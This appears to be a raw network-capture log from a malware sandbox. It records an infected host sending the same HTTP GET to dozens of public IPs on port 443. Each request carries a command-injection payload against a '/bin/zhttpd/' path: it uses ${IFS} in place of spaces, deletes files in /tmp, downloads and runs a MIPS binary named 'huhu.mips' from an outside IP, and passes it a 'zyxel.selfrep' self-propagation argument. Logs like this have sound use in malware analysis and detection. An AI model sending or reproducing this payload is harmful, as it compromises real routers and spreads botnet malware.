                                                      Feb 2, 2024 06:36:00.797199011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6336192.168.2.145297448.9.207.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797244072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6337192.168.2.144057027.252.150.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797271967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6338192.168.2.1434258111.213.162.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797296047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6339192.168.2.1449914133.86.141.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797348022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6340192.168.2.1448870211.249.58.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797375917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6341192.168.2.144095877.227.73.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797441959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6342192.168.2.143442057.4.26.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797472954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6343192.168.2.1448280205.91.15.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797516108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6344192.168.2.1441432222.112.224.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797557116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6345192.168.2.145557479.249.113.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797594070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6346192.168.2.1455964133.7.24.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797631025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6347192.168.2.1449206168.152.17.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797663927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6348192.168.2.1438024104.207.188.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797713995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6349192.168.2.1435724198.78.137.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797741890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6350192.168.2.143298079.238.179.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797785044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6351192.168.2.1443552216.0.159.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797804117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6352192.168.2.1444262150.121.120.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797838926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6353192.168.2.144481236.64.234.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797907114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6354192.168.2.1452570144.159.172.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797930956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6355192.168.2.143947239.101.183.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797996998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6356192.168.2.143650486.88.226.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798016071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6357192.168.2.144249452.148.246.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798058033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6358192.168.2.146006475.49.8.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798094034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6359192.168.2.144725049.168.65.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798141956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6360192.168.2.14557722.170.213.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798187971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6361192.168.2.144213481.68.8.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798228979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6362192.168.2.1436924114.213.65.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798260927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6363192.168.2.1445404186.45.119.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798317909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6364192.168.2.1455786148.56.131.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798338890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6365192.168.2.14539469.183.126.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798387051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6366192.168.2.145062023.236.75.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798425913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6367192.168.2.1455498147.171.210.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798471928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6368192.168.2.1435470216.140.12.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798518896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6369192.168.2.1458114202.76.241.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798566103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6370192.168.2.1457202144.206.64.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798598051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6371192.168.2.1434926116.151.251.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798646927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6372192.168.2.1456148223.65.132.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798685074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6373192.168.2.1442056119.210.29.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798713923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6374192.168.2.1446012152.19.180.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798762083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6375192.168.2.145385678.211.135.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798810959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6376192.168.2.1434254174.16.229.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798837900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6377192.168.2.1442746203.5.135.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798861027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6378192.168.2.145634867.24.106.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798897028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6379192.168.2.144505413.50.39.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798945904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6380192.168.2.1433286175.238.147.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.798984051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6381192.168.2.1436608196.211.171.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799022913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6382192.168.2.145933059.208.150.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799058914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6383192.168.2.1457440118.69.108.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799081087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6384192.168.2.1442572135.2.178.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799133062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6385192.168.2.1455192210.95.239.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799175024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6386192.168.2.144484638.244.155.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799218893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6387192.168.2.1437938142.77.26.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799259901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6388192.168.2.144913838.198.192.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799299002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6389192.168.2.1451696134.104.194.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799348116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6390192.168.2.1440174206.54.79.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799379110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6391192.168.2.1455012193.92.83.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799416065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6392192.168.2.144650417.156.217.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799478054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6393192.168.2.1440480118.176.152.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799501896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6394192.168.2.14417645.200.185.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799525023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6395192.168.2.146025459.224.109.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799585104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6396192.168.2.144116264.235.185.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799628019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6397192.168.2.1457968136.3.239.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799659967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6398192.168.2.143736876.189.2.165443
                                                      TimestampBytes transferredDirectionData
